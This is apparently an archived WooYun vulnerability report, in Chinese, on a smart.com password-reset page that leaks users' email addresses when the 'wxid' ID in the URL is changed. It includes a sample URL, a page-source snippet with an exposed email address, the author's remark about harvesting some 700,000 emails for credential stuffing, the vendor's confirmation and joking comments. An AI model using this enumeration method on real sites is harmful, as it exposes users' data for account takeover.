wxid后面不断更改id
查看源代码可以看到邮箱
这是1的
看看53
smart管理员
http://china.smart.com/sendpwd-htm-action-zhmm_step_wait-wxid-53.html

var countdown=61; 
function retransmit(value){
dataLayer.push({'event':'event', 'cat':'smart找回密码_主视觉', 'act':'浏览', 'lbl':',重新发送_201510230026'});
var email = "smart@openyourmind.cn";
$.post("sendpwd.php",{ step: "2", email: email } );


6.jpg


udi的数字看起来至少是70万,70万个邮箱再收集起来撞个库就。。。尴尬了~
网站名 smart 公社 网站首页 www.openyourmind.cn

审核时间
2016-02-04

备案号
京ICP备09046804号-12

状态
正常

主办单位性质
企业

漏洞证明:

1111

修复方案:

2222

版权声明:转载请注明来源 小龙@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-24 10:19

厂商回复:

确认此漏洞,感谢乌云平台及作者小龙对我公司及时提出预警!

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-24 08:50 | 爱偷懒的98 ( 普通白帽子 | Rank:180 漏洞数:61 | 从前车马邮件都很慢,一生只够爱一个人。)

    我代表官方送你一辆GLC级奔驰,请白帽子速度与我联系

  2. 2016-05-24 11:26 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    手机撸APP爆了?暂停?(*^__^*) 嘻嘻

  3. 2016-05-24 11:45 | 木易 ( 普通白帽子 | Rank:349 漏洞数:71 | 不,,不要误会,我不是针对谁,我是说在座...)

    那撸航空的岂不是要送飞机!

  4. 2016-05-24 12:09 | 爱偷懒的98 ( 普通白帽子 | Rank:180 漏洞数:61 | 从前车马邮件都很慢,一生只够爱一个人。)

    @木易 撸核弹系统,送你核弹 称霸世界

  5. 2016-07-08 10:32 | 欧尼酱 ( 路人 | Rank:17 漏洞数:9 | 陨星网络安全团队)

    我代表官方送你一辆GLC级奔驰,请白帽子速度与我联系

  6. 2016-07-08 10:40 | 1993* ( 实习白帽子 | Rank:34 漏洞数:10 | hacked by 菜菜(H))

    我代表官方送你一辆GLC级奔驰,请白帽子速度与我联系